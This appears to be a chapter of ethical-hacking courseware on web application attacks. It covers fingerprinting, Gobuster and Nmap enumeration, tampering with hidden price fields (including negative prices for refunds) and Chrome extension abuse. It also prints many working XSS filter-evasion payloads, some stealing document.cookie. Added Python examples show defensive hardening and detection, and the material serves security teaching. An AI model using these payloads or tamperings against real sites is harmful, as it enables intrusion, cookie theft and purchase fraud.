describes how attackers find vulnerabilities in a web application and exploit them.
Attackers need to analyze target web applications to determine their vulnerabilities. Doing so
helps them reduce the "attack surface." To analyze a web application, attackers acquire basic
knowledge of the web application. Then, they can analyze the active application's functionality
and technologies to identify any exposed attack surfaces.
■ Identify Entry Points for User Input: The first step in analyzing a web application is to
check for the application entry point, which can later serve as a gateway for attacks.
One of the entry points includes the front-end web application that intercepts HTTP
requests. Other web application entry points are user interfaces provided by web pages,
service interfaces provided by web services, serviced components, and .NET Remoting
components.
Attackers should review the generated HTTP request to identify the user input entry
points.
■ Identify Server-Side Technologies: Server-side technologies or server-side scripting
systems are used to generate dynamic web pages requested by clients, and they are
stored internally on the server. The server allows the running of interactive web pages
or websites on web browsers.


Commonly used server-side technologies include Active Server Pages (ASP), ASP.NET,
ColdFusion, JavaServer Pages (JSP), PHP, Python, and Ruby on Rails.
Attackers can fingerprint the technologies active on the server using various fingerprint
techniques such as HTTP fingerprinting.
• Identify Server-Side Functionality: Server-side functionality refers to the ability of a
server to execute programs on output web pages. User requests stimulate the scripts
residing on the web server to display interactive web pages or websites. The server
executes server-side scripts, which are invisible to the user.
Attackers should evaluate the server-side structure and functionality by keenly
observing the applications revealed to the client.
• Identify Files and Directories: Web servers host web applications, and
misconfigurations while hosting these web applications may lead to exposure of critical
files and directories over the Internet. Attackers identify the target web application's
files and directories exposed on the Internet using various automated tools such as
Gobuster. Such information further helps attackers gather sensitive information stored
in the files and folders.
■ Identify Web Application Vulnerabilities: Web applications are developed using various
technologies and platforms. Not following secure coding practices in the development
of web applications may leave flaws that can be exploited to perform various types of
attacks.
• Map the Attack Surface: Attackers then map the attack surface of the web application
to target specific vulnerable areas. They identify the various attack surfaces uncovered
by the applications as well as the vulnerabilities associated with them.
Identify Entry Points for User Input
Web application input gates help attackers launch various types of injection attacks on the
application. If such input gates are vulnerable to attacks, gaining access to the application is
easy. Thus, during web application analysis, attackers try to identify entry points for user input
so that they can understand how the web application accepts or handles the user input.
Attackers examine the URL, HTTP header, query string parameters, POST data, and cookies to
determine all the user input fields. They also identify HTTP header parameters that can be
processed by the application as user inputs, such as User-Agent, Referer, Accept, Accept-
Language, and Host. Furthermore, they determine URL encoding techniques and other
encryption measures implemented to secure web traffic, such as SSL. Then, they can find the
vulnerabilities present in the input mechanism and exploit them to gain access to the web
application.
Use the following tools to analyze the web application:
■ Burp Suite (https://portswigger.net)
• WebScarab (https://owasp.org)
• OWASP Zed Attack Proxy (https://www.zaproxy.org)
■ httprint (https://www.net-square.com)


Identify Server-Side Technologies

• Perform detailed server fingerprinting and analyze the HTTP headers and HTML source
code to identify server-side technologies
• Examine URLs for file extensions, directories, and other identification information

• Examine the error page messages


• Examine session tokens: JSESSIONID - Java, ASPSESSIONID - IIS server,
ASP.NET_SessionId - ASP.NET, PHPSESSID - PHP

■ Use tools such as httprint and WhatWeb to identify server-side technologies

Server Error in '/ReportServer' Application.

Could not find the permission set named 'ASP.Net'.
Description: An unhandled exception occurred during the
execution of the current web request. Please review the stack
trace for more information about the error and where it
originated in the code.

Version Information: Microsoft .Net Framework Version
4.0.30319; ASP.Net Version 4.0.30319.1

Figure 14.55: Screenshot displaying error message
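The two analysis steps above, Identify Entry Points for User Input and Identify Server-Side Technologies, as one added example that is not part of the courseware: a captured request is inventoried for every user-controlled input, and the matching response is checked for the header, session-cookie and error-page disclosures listed. Both messages are constructed; www.example.test is a placeholder host.

```python
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Header fields the text lists as processed by applications as user input
INPUT_HEADERS = ("User-Agent", "Referer", "Accept", "Accept-Language", "Host")
# Session cookie names that reveal the server-side platform
SESSION_COOKIES = {"JSESSIONID": "Java", "ASPSESSIONID": "IIS (classic ASP)",
                   "ASP.NET_SessionId": "ASP.NET", "PHPSESSID": "PHP"}
# Response headers that disclose server software or framework versions
DISCLOSING_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}


def parse_http(raw: str) -> Tuple[str, List[Tuple[str, str]], str]:
    """Split a raw HTTP message into start line, ordered header pairs, and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def entry_points(raw_request: str) -> Dict[str, List[str]]:
    """Every place user-controlled data enters: query string, POST body, cookies, headers."""
    start, headers, body = parse_http(raw_request)
    method, target, _ = start.split(" ", 2)
    hmap = {k.lower(): v for k, v in headers}
    cookie_header = hmap.get("cookie", "")
    return {
        "query": [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)],
        "body": [k for k, _ in parse_qsl(body, keep_blank_values=True)] if method == "POST" else [],
        "cookies": [c.split("=", 1)[0].strip() for c in cookie_header.split(";") if c.strip()],
        "headers": [h for h in INPUT_HEADERS if h.lower() in hmap],
    }


def technology_disclosures(raw_response: str) -> List[str]:
    """What a fingerprinting tool (or anyone reading the headers) learns from one response."""
    _, headers, body = parse_http(raw_response)
    findings: List[str] = []
    for name, value in headers:
        if name.lower() in DISCLOSING_HEADERS:
            findings.append(f"{name}: {value}")
        if name.lower() == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            if cookie in SESSION_COOKIES:
                findings.append(f"session cookie {cookie} => {SESSION_COOKIES[cookie]}")
    # A verbose framework error page leaks versions and stack traces.
    if "Server Error in" in body and "Version Information" in body:
        findings.append("verbose ASP.NET error page with version information")
    return findings


# Constructed request/response pair modelled on the customers.aspx URL discussed in the text
REQUEST = ("POST /customers.aspx?name=existing%20clients&showBy=name HTTP/1.1\r\n"
           "Host: www.example.test\r\n"
           "User-Agent: Mozilla/5.0\r\n"
           "Referer: https://www.example.test/\r\n"
           "Cookie: ASP.NET_SessionId=abc123; theme=dark\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
           "isActive=0&startDate=20%2F11%2F2020")
RESPONSE = ("HTTP/1.1 500 Internal Server Error\r\n"
            "Server: Microsoft-IIS/10.0\r\n"
            "X-Powered-By: ASP.NET\r\n"
            "X-AspNet-Version: 4.0.30319\r\n"
            "Set-Cookie: ASP.NET_SessionId=abc123; path=/; HttpOnly\r\n\r\n"
            "<html><body><h1>Server Error in '/ReportServer' Application.</h1>"
            "<b>Version Information:</b> Microsoft .Net Framework Version 4.0.30319</body></html>")
```

The findings list doubles as a hardening checklist for the defending side: strip Server, X-Powered-By and X-AspNet-Version, rename the default session cookie, and replace framework error pages with a generic one.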


■ httprint
Source: https://www.net-square.com
httprint is a web server fingerprinting tool that relies on web server characteristics to
accurately identify web servers, even though they may have been obfuscated by
changing the server banner strings or by plug-ins such as mod_security or server mask.
httprint can also be used to detect web-enabled devices that do not have a server
banner string, such as wireless access points, routers, switches, and cable modems.
httprint uses text signature strings, and it is very easy to add signatures to the signature
database.

Figure 14.56: Screenshot of httprint (reported banner nginx/1.19.10, the computed signature, and best-match candidates such as Apache/2.0.x and Apache/1.3.26 with confidence scores)


■ WhatWeb

Source: https://github.com
WhatWeb scans and identifies web technologies, including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web
servers, and embedded devices. WhatWeb has over 1800 plugins, each of which
recognizes something different. WhatWeb also identifies version numbers, email
addresses, account IDs, web framework modules, SQL errors, and more.

Figure 14.57: Screenshot showing output of WhatWeb

Identify Server-Side Functionality

After determining the server-side technologies, attackers try to identify the server-side
functionality to find potential vulnerabilities. They examine the page source and URLs and make
educated guesses to determine the internal structure and functionality of web applications.
They use the following tools to do so.
■ GNU Wget

Source: https://www.gnu.org
GNU Wget is employed for retrieving files using HTTP, HTTPS, and FTP, which are the
most widely used Internet protocols. It is a non-interactive command-line tool; hence, it
can be called from scripts, cron jobs, and terminals without X-Windows support.


Figure 14.58: Screenshot displaying GNU Wget command-line utility tool

• BlackWidow (http://softbytelabs.com)
■ curl (https://curl.se)
■ Examine URL
An SSL certified page URL starts with https instead of http. If a page contains a .aspx
extension, the application is likely written using ASP.NET. If the query string has a
parameter named showBy, then you can assume that the application is using a database
and will display the data by that value.

https://www.certifiedhacker.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2020&endDate=20%2F04%2F2022&showBy=name

Figure 14.59: Identify Server-Side Functionality by examining URL (https indicates SSL, .aspx indicates the ASPX platform, and showBy=name points to a database column)

Identify Files and Directories


Attackers use various techniques and tools to enumerate applications, hidden directories, and
files of the web application hosted on web servers that are exposed on the Internet. They use
tools such as Gobuster and URL Fuzzer and the Nmap NSE script http-enum to identify files and
directories of the target web application.


■ Gobuster
Source: https://github.com
Gobuster is a Go-programming-based directory scanner that allows attackers to perform
fast-paced enumeration of hidden files and directories of a target web application. It is a
command-oriented tool used to brute-force URIs in websites, DNS subdomains, names
of virtual hosts on the target server, etc.
Run the following command to retrieve file and directory names and their status codes:
gobuster -u <target URL> -w common.txt

Figure 14.60: Screenshot show ing t he output of Gobuster tool


Use the -s flag to retrieve files and directories related to specific status codes:
gobuster -u <target URL> -w common.txt -s 200

Figure 14.61: Screenshot show ing the output of Gobuster tool

Similarly, the -q and -n flags can provide a quick view of the directories without banner
and status codes. You can also output the result to an output file using the -o flag.


■ Nmap
Source: https://nmap.org
Attackers use the Nmap NSE script http-enum to enumerate applications, directories
and files of web servers that are exposed on the Internet. Thus, they can identify critical
security vulnerabilities in the target web application.
Run the following Nmap command to gather information about the exposed files and
directories of the target web server:
nmap -sV --script=http-enum <target domain or IP address>

Figure 14.62: Screenshot of Nmap command

Identify Web Application Vulnerabilities

Attackers use various techniques to detect vulnerabilities in target web applications hosted on
web servers to gain administrator-level access to the server or retrieve sensitive information
stored on the server. They scan applications for identifying vulnerabilities and detect attack
surfaces on the target applications. Performing comprehensive vulnerability scanning can
disclose security flaws associated with executables, binaries, and technologies used in a web
application. Through vulnerability scanning, attackers can also catalog different vulnerabilities,
prioritize them based on their threat levels, and use them while targeting an application.
Attackers can use tools such as Vega, WPScan Vulnerability Database, Arachni, and Uniscan to
identify vulnerabilities in the target web applications.


■ Vega
Source: https://www.subgraph.com
Vega is a free and open-source web security scanner and web security testing platform
for testing the security of web applications. Vega helps you to find and validate SQL
injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and
other vulnerabilities. It is written in Java and is GUI-based, and it runs on Linux, OS X,
and Windows. Vega also helps you to find vulnerabilities such as reflected cross-site
scripting, stored cross-site scripting, blind SQL injection, remote file include, shell
injection, and others. It also probes TLS/SSL security settings and identifies opportunities
for improving the security of your TLS servers.

Figure 14.63: Screenshot of Vega (Scan Alert Summary for 10.10.1.22: High - Session Cookie Without Secure Flag, Session Cookie Without HttpOnly Flag, Cleartext Password over HTTP; Medium - HTTP Trace Support Detected, Local Filesystem Paths Found; Low - Directory Listing Detected; Info - HTTP Error Detected)

Some additional web application scanning tools are as follows:


■ WPScan Vulnerability Database (https://wpscan.com)
■ Arachni (https://www.arachni-scanner.com)
■ appspider (https://www.rapid7.com)
■ Uniscan (https://sourceforge.net)


Map the Attack Surface


Once the attackers detect the entry points, server-side technologies, and functionalities, they
can find their respective vulnerabilities and map the attack surface area of the target web
application. Web application analysis thus helps attackers reduce their attack surface. Attackers
consider the following factors in planning their attack.

Information | Attack
Client-Side Validation | Injection Attack, Authentication Attack
Database Interaction | SQL Injection, Data Leakage
File Upload and Download | Directory Traversal
Display of User-Supplied Data | Cross-Site Scripting
Dynamic Redirects | Redirection, Header Injection
Login | Username Enumeration, Password Brute-Force
Session State | Session Hijacking, Session Fixation
Injection Attack | Privilege Escalation, Access Controls
Cleartext Communication | Data Theft, Session Hijacking
Error Message | Information Leakage
Email Interaction | Email Injection
Application Code | Buffer Overflows
Third-Party Application | Known Vulnerabilities Exploitation
Web Server Software | Known Vulnerabilities Exploitation

Table 14.2: Table showing information and respective attacks


Bypass Client-side Controls

A web application requires client-side controls to prevent user inputs from affecting data transmission via client
components and to implement measures that control a user's interaction with his or her own client

Web developers often think that the data transmitted from the client to server is under control by the user, and
this assumption can make applications vulnerable to various attacks

■ Attack Hidden Form Fields: Identify hidden form fields in a web page and manipulate its tags and fields to exploit the web page before it transmits data to the server
■ Attack Browser Extensions: Attempt to intercept the traffic from browser extensions or decompile the browser extensions to capture user data
■ Perform Source Code Review: Perform a source code review to identify vulnerabilities in the code that cannot be identified by traditional vulnerability scanning tools
■ Evade XSS Filters: Evade XSS filters by injecting unusual characters into the HTML code

Bypass Client-side Controls: Attack Hidden Form Fields

■ In any e-commerce/retailing web application, the developer flags certain fields like product name and product price as hidden to prevent the user from viewing and modifying the fields
■ In every client session, developers use hidden fields to store client information, including product prices and discount rates
■ To exploit such vulnerable web applications, save the source code for the HTML page, tamper the price values by editing the price field's value, and reload the source into a browser. The Buy button can then be clicked to buy the product at the edited price
■ You can also attempt to provide negative values in the price field to get a refund from the application
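The hidden-price flaw described above, as an added example that is not part of the courseware: a vulnerable checkout that charges whatever the hidden price field says, beside a hardened one that re-derives the price from the server-side catalog and validates the quantity. The catalog, the form dictionaries and the function names are constructed for illustration.

```python
from decimal import Decimal, InvalidOperation
from typing import Dict

# Server-side catalog (constructed): the only price the application should ever charge.
CATALOG = {"SKU-100": Decimal("49.99"), "SKU-200": Decimal("199.00")}


class OrderError(ValueError):
    """Raised when submitted order data is rejected."""


def checkout_vulnerable(form: Dict[str, str]) -> Decimal:
    """Vulnerable: the price comes back from the client's hidden <input> field,
    so editing the saved page (or the request) changes what is charged, and a
    negative value turns the order into a credit."""
    return Decimal(form["price"]) * int(form["quantity"])


def checkout_hardened(form: Dict[str, str]) -> Decimal:
    """Hardened: the client may choose product and quantity only; the price is
    looked up server-side and the quantity is validated as a bounded positive
    integer. Any client-supplied price is ignored."""
    sku = form.get("product", "")
    if sku not in CATALOG:
        raise OrderError(f"unknown product {sku!r}")
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        raise OrderError("quantity must be an integer") from None
    if not 1 <= quantity <= 100:
        raise OrderError("quantity out of range")
    # A submitted price that disagrees with the catalog is a tampering signal
    # worth logging; the value itself is never used for the total.
    try:
        if "price" in form and Decimal(form["price"]) != CATALOG[sku]:
            pass  # hook for logging a tampering attempt
    except InvalidOperation:
        pass
    return CATALOG[sku] * quantity


def order_rejected(form: Dict[str, str]) -> bool:
    """True when the hardened handler refuses the submission."""
    try:
        checkout_hardened(form)
    except OrderError:
        return True
    return False


# Constructed form submissions: what the page's hidden price field sends, the
# same submission with the hidden value edited, and one with a negative price.
HONEST_FORM = {"product": "SKU-200", "quantity": "1", "price": "199.00"}
TAMPERED_FORM = {"product": "SKU-200", "quantity": "1", "price": "1.00"}
NEGATIVE_FORM = {"product": "SKU-200", "quantity": "2", "price": "-199.00"}
```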


Bypass Client-side Controls: Attack Browser Extensions

Capturing data from a web application that uses browser extension components can be achieved by two methods:

■ Intercepting Traffic from Browser Extensions: Attempt to intercept and modify requests made by the component as well as responses from the server. Use tools like Burp Suite to capture the data. The main advantage of this technique is that it allows you to modify data present in the requests that are sent to the server, regardless of any mechanisms employed to obfuscate or encrypt the transmitted data.
■ Decompiling Browser Extensions: In this technique, you can attempt to decompile the component's bytecode to view its detailed source, which allows you to identify detailed information of the component functionality.

Bypass Client-side Controls: Attack Google Chrome Browser Extensions

■ Attackers first lure victims into downloading a malicious file or prompt them to visit a malicious website so that they can easily infect the target browser
■ After malware has been installed, the browser forces users to perform specific actions such as activating extensions and allowing permissions to exfiltrate data
■ Attackers may target the Chrome Sync feature, which allows a smooth browsing experience for users across multiple platforms
■ Leveraging this feature on the compromised browser, attackers can add fake or malicious extensions that appear to be legitimate
■ Using this technique, attackers can gather stored information on the browser such as autofill information, bookmarked data, search history, passwords, configuration settings, and other synchronized data

[Screenshot: Chrome Extensions page listing the "Forcepoint Endpoint Chrome Extension for Windows"]


Bypass Client-side Controls: Perform Source Code Review

Examine the web application source code and understand the working of components in the code to identify the following functionalities of the components:

■ Client-side input validation
■ Employed obfuscation or encryption techniques on transmitted data
■ Modifiable components with hidden client-side functionality
■ References to server-side functionality

Bypass Client-side Controls: Evade XSS Filters

Encoding Characters
■ Many characters in HTML elements can be written in ASCII codes to evade filters that search for strings such as <javascript>:
<a href="&#106;avascript:alert('XSS Successful')">Click Here!</a>
■ Use hexadecimal encoding to bypass filters that search for HTML elements by scanning for &# along with numeric characters:
<a href="&#x6A;avascript:alert(document.cookie)">Click Here!</a>

Embedding Whitespaces
■ Use tab spaces to evade detection:
<img src="java	script:al	ert('Successful XSS')">
■ You can also encode the tab spaces:
<img src="java&#x09;script:al&#x09;ert('Successful XSS')">
■ You can also encode using carriage return and new line characters:
<a href="jav&#x0A;ascript:&#x0A;ale&#x0D;rt('Successful XSS')">Visit xyz.com</a>

Manipulating Tags
■ You can embed a <script> tag within <script>:
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
■ Separate attributes and tags with a slash in an HTML element:
<img/src="popup.jpg" onload=&#x6A;avascript:eval(alert('Successful&#32XSS'))>
■ Use abnormal tag inputs to bypass filters:
<a onmousedown=alert(document.cookie)>visit xyz.com</a>

Bypass Client-side Controls


A web application requires client-side controls to restrict user inputs when transmitting data via
client components and implementing measures to control the user's interaction with his or her
own client. A developer uses techniques such as hidden HTML form fields and browser
extensions to allow the transmission of data to the server via the client. Often, web developers
assume that the data transmitted from the client to the server is within the user's control, and
this assumption can make the application vulnerable to various attacks.


Some of the techniques to bypass the client-side controls are as follows:


■ Attack Hidden Form Fields: Identify hidden form fields on the web page and manipulate
the tags and fields to exploit the web page before transmitting the data to the server.
■ Attack Browser Extensions: Attempt to intercept the traffic from the browser
extensions or decompile the browser extensions to capture user data.
■ Perform Source Code Review: Perform source code review to identify vulnerabilities in
the code that cannot be identified by traditional vulnerability scanning tools.
■ Evade XSS Filters: Evade XSS filters by injecting unusual characters into the HTML code.

Attack Hidden Form Fields


E-commerce/retailing web applications use hidden HTML form fields to restrict the user from
viewing/modifying data fields such as "products" and "prices of products" and allow the user to enter
certain fields such as "quantity," assuming that the user enters the required quantity before
submitting the data to the server. The developer flags these fields as hidden to restrict the user
from modifying them. In every client session, developers use hidden fields to store client
information, including product prices and discount rates.
Follow the process described below to attack hidden form fields:
■ Identify vulnerable web applications
■ Save the source code for the HTML page
■ Locate the hidden field
■ Tamper with the price values by editing the price field's value
■ Save the file and reload the source into a browser
■ Click the Buy button
The request will be transmitted to the server with the modified price. You can also use proxy
tools such as Burp Suite to trap the request that submits the form and modify the price field to
any value. In addition, you can attempt to enter negative price values to trick the retail
application into refunding the amount through credit card transactions.
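The server-side counterpart to the procedure above, as an added example that is not part of the EC-Council module: a checkout that trusts the hidden price field beside one that recomputes the price from its own catalog, plus an HMAC-bound hidden field for values that genuinely must round-trip through the client. The catalog, form data and key are constructed for illustration.

```python
"""Added example (not from the EC-Council module): why a server must never
trust hidden form fields such as price, and what to do instead.
All product data, form submissions and keys below are constructed."""
import hashlib
import hmac
from decimal import Decimal

# Constructed catalog: the only price source the server should ever consult.
CATALOG = {"SKU-100": Decimal("49.99"), "SKU-200": Decimal("12.50")}
# Constructed key for the signed-hidden-field variant; keep it server-side.
SERVER_KEY = b"constructed-demo-key-rotate-in-production"


def vulnerable_checkout(form: dict) -> Decimal:
    """Trusts the hidden 'price' field exactly as the module describes: an
    edited price, or a negative one, is charged (or refunded) as submitted."""
    return Decimal(form["price"]) * int(form["quantity"])


def hardened_checkout(form: dict) -> Decimal:
    """Ignores any client-supplied price, recomputes it from the catalog and
    bounds the one field the user legitimately controls (quantity)."""
    sku = form.get("product_id")
    if sku not in CATALOG:
        raise ValueError("unknown product")
    quantity = int(form.get("quantity", "0"))
    if not 1 <= quantity <= 1000:
        raise ValueError("quantity out of range")
    return CATALOG[sku] * quantity


def sign_hidden_field(value: str) -> str:
    """If a value must round-trip through a hidden field (e.g. a quoted
    discount rate), bind it to an HMAC so any client edit is detectable."""
    tag = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{tag}"


def verify_hidden_field(signed: str):
    """Returns the original value, or None if the field was tampered with."""
    value, _, tag = signed.rpartition("|")
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    # Hidden price edited to a negative value before the Buy button is pressed.
    tampered = {"product_id": "SKU-100", "price": "-49.99", "quantity": "2"}
    print("vulnerable total:", vulnerable_checkout(tampered))  # -99.98, a refund
    print("hardened total:  ", hardened_checkout(tampered))    # 99.98
    signed = sign_hidden_field("0.15")                         # 15% discount rate
    print("intact:", verify_hidden_field(signed),
          "edited:", verify_hidden_field(signed.replace("0.15", "0.99", 1)))
```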
Attack Browser Extensions

The data from a web application that uses browser extension components can be captured by
two methods:
■ Intercepting Traffic from Browser Extensions
Attempt to intercept and modify the request and response of the component and the
server, respectively. You can use tools such as Burp Suite to capture the data. This
method has certain limitations such as data obfuscation or encryption, and secure data
serialization.
■ Decompiling Browser Extensions

Using this technique, you can attempt to decompile the component's bytecode to view
its detailed source, which allows you to identify the detailed information of the
component functionality. The main advantage of this technique is that it allows you to
modify data present in the requests that are sent to the server, regardless of any
obfuscation or encryption mechanisms employed for the transmitted data.
You can use proxy tools such as Burp Suite to capture and modify the web page
component requests. In the context of bypassing client-side input validation that is
implemented in a browser extension, if the component submits the validated data to
the server transparently, this data can be modified using an intercepting proxy in the
same way as that described for HTML form data.
Attack Google Chrome Browser Extensions
To compromise any web browser, attackers first lure victims into downloading a malicious file
or prompt them to visit a malicious website so that they can easily infect the target browser.
After malware has been installed, the browser forces users to perform specific actions such as
activating extensions and allowing permissions to exfiltrate data.
For example, in the context of Google Chrome, attackers may target the Chrome Sync feature,
which allows a smooth browsing experience for users across multiple platforms. Leveraging this
feature on the compromised browser, attackers can add fake or malicious extensions that
appear to be legitimate, through which they can gather stored information on the browser such
as autofill information, bookmarked data, search history, passwords, configuration settings, and
other synchronized data.
The following screenshot shows the installation of a fake extension called Forcepoint from a
compromised browser, which can be used to exfiltrate the synced data from the user device to
a remote attacker.

Figure 14.64: Screenshot of the Google Chrome Forcepoint extension


The following information can be gathered by attackers after infecting the Google Chrome
browser.
■ User Activity

o User's spoken language


o Most recent sites visited
o Types of media files accessed the most
o Financial transactions through e-commerce sites
o User's trusted contact list and details saved on the browser
o Geo-location
o User device's gyro and proximity sensor data while using GPS
■ User-Created Personal Information

o Username, passwords, identities, financial account details, and contact information


saved on the browser
o Custom browser settings
o Other information such as user reactions to social media posts or files uploaded to
websites
o Data collected from user-account-linked devices
o Device information, applications installed, services used, etc.
■ Other Information

o Files, news, data, and services that are related to the user
o Third-party websites or service providers such as e-commerce sites, social media sites,
research sites, and business service providers
o Cookies, pixel tags, application cache, browser web storage, and server log files
Perform Source Code Review

Attempt to acquire the source code of the target web application. After acquiring the source
code, examine the code to understand the components, frameworks, etc., as well as their
working to identify any existing vulnerabilities in the code. This examination can provide
information about various functionalities such as removing client-side input validation,
submitting nonstandard data to the server, manipulating client-side states or events, or directly
invoking functionality that is present within the component.
Perform source code review to identify the following functionalities of a target component:
■ Client-side input validation or other security-related logics and events
■ Obfuscation or encryption techniques that are applied to the client data before it is
transmitted to the server


■ Modifiable components with hidden client-side functionalities


■ References to server-side functionalities
Evade XSS Filters
XSS filter implementations are applied to web browsers to protect them from imminent XSS
attacks; however, attackers can make them vulnerable by injecting unusual characters into the
HTML code, through which they can evade the filter implementations.
Attackers can embed harmful JavaScript into a web application in many ways. However, the
latest browsers are implemented with strong security measures; hence, the script injection
sometimes fails. Therefore, attackers often try to not only take advantage of application design
flaws but also bypass input evaluation processes conducted by the server or application to trick
complicated browser filters.
XSS attacks usually exploit improper configurations and security implementations of a browser,
whereas filter bypassing methods are carried out by leveraging flaws in a server or browser-side
filters, targeting certain versions or products.
A majority portion of the browser code is written with proper security measures to handle
abnormal HTML, JavaScript, and CSS to fix them before delivery to the end users. XSS filter
bypassing leverages such an intricate composition of specifications, exceptions, languages, and
other browser characteristics to inject scripts through the filters without leaving a trace.
Various XSS filter evasion techniques are discussed below:
Inserting <script> tags into the code is not allowed in a general context. However, some other
HTML tags can permit these unusual injections. Event handlers are employed to run specific
scripts corresponding to the authorized user actions. In general, event handlers such as
<onfocus>, <onerror>, and <onclick> can be exploited to evade XSS filters.
■ Encoding Characters
Attackers can embed various characters in different ways to evade filters that focus on
inspecting text to detect unwanted strings. Approaches for character encoding include
the following:
o A few or all of the characters of HTML elements can be written using ASCII codes to
evade filters that search for strings such as <javascript>:
<a href="&#106;avascript:alert('XSS Successful')">Click Here!</a>

o Hexadecimal encoding can be used to bypass filters that search for HTML elements
by scanning for &# along with numeric characters:
<a href="&#x6A;avascript:alert(document.cookie)">Click Here!</a>

o Base64 encoding can be used to cover the tracks of attack code; it pops up an alert
with "Successful XSS":
<body onload="eval(atob('U3VjY2Vzc2Z1bCBYU1M='))">


o Numeric character references can contain between 1 and 7 digits, and leading zeros
are ignored. Therefore, any amount of zero padding is allowed:
<a href="&#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click Here!</a>

o XSS payloads can be concealed using character codes:
<iframe src=# onmouseclick=alert(String.fromCharCode(88,83,83))></iframe>

■ Embedding Whitespaces

Browsers allow convenient usage of whitespace characters while writing JavaScript or
HTML code. Thus, attackers can easily evade filters by inserting non-printable
characters.
o Tab spaces are avoided while processing the code; they can be invoked to split
keywords. Consider this <img> tag:
<img src="java	script:al	ert('Successful XSS')">

o You can also encode the tab spaces:
<img src="java&#x09;script:al&#x09;ert('Successful XSS')">

o Similarly, carriage return and newline characters are not considered during
processing; thus, attackers can also encode these characters in between:
<a href="jav&#x0A;ascript:&#x0A;ale&#x0D;rt('Successful XSS')">Visit xyz.com</a>

■ Manipulating Tags

XSS filter evasion can also be performed by manipulating tags and skipping attributes.
o When the filter inspects the script and deletes certain tags (mostly <script>), placing
them within other tags can leave legitimate code after they are deleted:
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

o Attributes and tags can be separated by supplying a slash that helps in bypassing
whitespace restrictions in value insertion:
<img/src="popup.jpg"onload=&#x6A;avascript:eval(alert('Successful&#32XSS'))>

o Attackers also exploit browser interpretations and abnormal tag inputs to bypass
filters. The following example shows how to skip the <href> tag:
<a onmousedown=alert(document.cookie)>visit xyz.com</a>
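Added example, not from the module: a normalize-then-match check that decodes character references to a fixpoint and strips the whitespace browsers ignore before matching, run over the evasion payloads listed above (reconstructed from the module text) beside the single-pass blacklist they defeat. Function and constant names are this example's own.

```python
"""Added example (not from the EC-Council module): why a filter must match
against the canonical form of input, shown on the evasion payloads above."""
import re

# Numeric character references: semicolon optional and zero padding allowed,
# as HTML parsers accept both, so "&#0000106" and "&#x6A;" both become "j".
DEC_REF = re.compile(r"&#(\d{1,7});?")
HEX_REF = re.compile(r"&#[xX]([0-9a-fA-F]{1,6});?")
SCRIPT_TAG = re.compile(r"</?\s*script\s*>", re.I)
# An on*= attribute introduced by whitespace, a quote, a slash or a tag bracket.
EVENT_HANDLER = re.compile(r"""(?:^|[\s"'/<])on[a-z]+\s*=""", re.I)

# Payloads reconstructed from the evasion techniques listed in the module.
PAYLOADS = [
    "<a href=\"&#106;avascript:alert('XSS Successful')\">Click Here!</a>",
    "<a href=\"&#x6A;avascript:alert(document.cookie)\">Click Here!</a>",
    "<body onload=\"eval(atob('U3VjY2Vzc2Z1bCBYU1M='))\">",
    "<a href=\"&#x6A;avascript&#0000058&#0000097lert('Successful XSS')\">Click Here!</a>",
    "<iframe src=# onmouseclick=alert(String.fromCharCode(88,83,83))></iframe>",
    "<img src=\"java\tscript:al\tert('Successful XSS')\">",
    "<img src=\"java&#x09;script:al&#x09;ert('Successful XSS')\">",
    "<a href=\"jav&#x0A;ascript:&#x0A;ale&#x0D;rt('Successful XSS')\">Visit xyz.com</a>",
    "<scr<script>ipt>document.write(\"Successful XSS\")</scr<script>ipt>",
    "<img/src=\"popup.jpg\"onload=&#x6A;avascript:eval(alert('Successful&#32XSS'))>",
    "<a onmousedown=alert(document.cookie)>visit xyz.com</a>",
]


def naive_detect(html: str) -> bool:
    """Blacklist that only looks for the literal strings in the raw input."""
    return bool(re.search(r"<script|javascript:", html, re.I))


def naive_sanitize(html: str) -> str:
    """Single pass that deletes <script> tags; nested tags regrow after it."""
    return SCRIPT_TAG.sub("", html)


def _decode_ref(match, base: int) -> str:
    code = int(match.group(1), base)
    return chr(code) if code <= 0x10FFFF else ""


def canonicalize(html: str) -> str:
    """Decode numeric character references until nothing changes (handles
    double encoding), lower-case, and drop the TAB/CR/LF/NUL characters a
    browser ignores inside a URL scheme."""
    prev = None
    while prev != html:
        prev = html
        html = DEC_REF.sub(lambda m: _decode_ref(m, 10), html)
        html = HEX_REF.sub(lambda m: _decode_ref(m, 16), html)
    return re.sub(r"[\t\r\n\x00]", "", html.lower())


def strip_script_fixpoint(html: str) -> str:
    """Keep removing <script> tags until the text is stable, so that
    <scr<script>ipt> cannot regrow into <script> after one pass."""
    prev = None
    while prev != html:
        prev, html = html, SCRIPT_TAG.sub("", html)
    return html


def is_malicious(html: str) -> bool:
    """Match against the canonical form rather than the raw bytes."""
    canon = canonicalize(html)
    compact = re.sub(r"\s+", "", canon)  # 'java script:' also collapses
    return bool("javascript:" in compact
                or "<script" in canon
                or EVENT_HANDLER.search(canon)
                or "fromcharcode(" in compact
                or "atob(" in compact)


def evasion_report(payloads) -> tuple:
    """(payloads caught by the naive filter, payloads caught after canonicalization)."""
    return (sum(naive_detect(p) for p in payloads),
            sum(is_malicious(p) for p in payloads))


if __name__ == "__main__":
    print("naive vs canonical hits:", evasion_report(PAYLOADS))  # (1, 11)
    print("one-pass strip leaves:", naive_sanitize(PAYLOADS[8]))
    print("fixpoint strip leaves:", strip_script_fixpoint(PAYLOADS[8]))
```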


